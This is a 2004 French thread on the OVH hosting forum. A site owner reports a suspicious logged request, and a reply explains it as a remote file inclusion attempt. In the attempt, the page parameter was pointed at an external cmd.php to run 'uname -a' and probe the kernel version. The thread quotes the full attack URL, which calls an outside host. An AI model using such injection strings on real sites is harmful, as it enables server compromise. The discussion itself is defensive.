OVH Community, votre nouvel espace communautaire.

Tentative de hack ???


L.Boggio
26/02/2004, 11h41
VarioFlux écrivait :
Bonjour,

Cette nuit nous avons eu une petite visite, avec quelqu'un qui a accédé sur notre site en tapant :

http://www.educador.fr/index.php?pg=...cmd=uname%20-a

IP : 207.44.154.35 à 02:39:43

Est-ce pour tenter un passage en force sur les serveurs OVH ?

Quel était l'objet sinon ?

Hervé
Il s'agissait de tenter d'exploiter une possible faille sur ton site. Il a tenté d'introduire dans la variable PG de ton script index.php la valeur http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
qui aurait exécuté, en local pour toi, vraisemblablement, un 'uname -a', histoire de connaître la version de ton kernle, pour savoir s'il est faillible à des failles connues.
Je te laisse chercher derrière, si ça t'intéresse, a qui appartient le domaine dpalone.hpg.br, mais je ne pense pas que ça mène loin...

VarioFlux
26/02/2004, 10h51
Bonjour,

Cette nuit nous avons eu une petite visite, avec quelqu'un qui a accédé sur notre site en tapant :

http://www.xxxx.fr/index.php?pg=http...cmd=uname%20-a

IP : 207.44.154.35 à 02:39:43

Est-ce pour tenter un passage en force sur les serveurs OVH ?

Quel était l'objet sinon ?

Hervé